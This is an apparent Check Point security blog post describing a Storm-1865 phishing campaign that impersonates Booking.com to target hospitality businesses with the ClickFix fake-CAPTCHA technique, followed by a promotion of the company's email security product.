Overview:

A sophisticated phishing operation has emerged as a significant concern for the hospitality sector. The campaign leverages innovative social engineering techniques to compromise business systems and data.

Strategic Targeting:

Cyber security researchers have found that the campaign specifically targets hospitality organizations with established Booking.com business relationships across multiple regions, including North America, Oceania, Europe and various Asian markets.

Forensic analysis of the malware has revealed that its primary objectives are to harvest credentials and to compromise financial accounts.

Technical Innovation:

One thing that makes this campaign unique is its deployment of a technique that security researchers have dubbed “ClickFix” – a methodological advancement in malware delivery that circumvents traditional cyber security controls.

When this technique is applied, victims receive counterfeit system notifications or error messages that seem legitimate. Said messages encourage users to take actions that execute concealed malicious code.

According to analysts, this approach is particularly effective because:

  • The notifications look authentic and contain plausible information
  • The attack uses native operating system functionality to execute malicious code
  • The attack’s configuration means that it likely will not trigger conventional malware detection mechanisms

Attack Sequence and Methodology:

The attack starts with contextually relevant communications that impersonate Booking.com, weaponizing industry-specific topics that are likely to prompt immediate action.

These include notifications regarding customer reviews, account security verification requirements, and demands from potential guests.

After engaging with embedded content, recipients are directed to sophisticated phishing environments, featuring fake CAPTCHA exercises. The screen then tells victims to execute commands via a Windows Run functionality, at which point, the malware is deployed.

Organizational Risk Implications:

The threat actors’ strategic focus on Booking.com business partners suggests that they are taking a calculated approach and want to exploit organizations with high-value data, resources, and simple financial transaction capabilities.

This is a campaign that could affect hospitality organizations financially, operationally or legally. The ensuing reputational damage could also impact stakeholder confidence.

About Storm-1865

Across the past few years, the threat actors behind this campaign, known as Storm-1865, have demonstrated increased technique sophistication. ClickFix implementation suggests a significant tactical evolution. The group's volume of output has also increased. 

Enterprise Protection Strategy: Check Point Harmony Email & Collaboration

Check Point Harmony Email & Collaboration delivers comprehensive protection through:

  • AI-powered threat detection systems capable of identifying sophisticated social engineering attempts
  • Zero-day threat prevention technology that recognizes novel attack patterns
  • Multi-layer email inspection capabilities examining message content, structure and behavioral patterns
  • Cross-platform security integration that offers comprehensive collaboration tool protection
  • Employee-centric security awareness programs that can enhance organizational resilience

Implementing robust email and collaboration security helps to protect everything that you’ve worked hard to build. To learn more about how Harmony Email & Collaboration can keep your systems secure, schedule a demo or reach out to your local Check Point representative.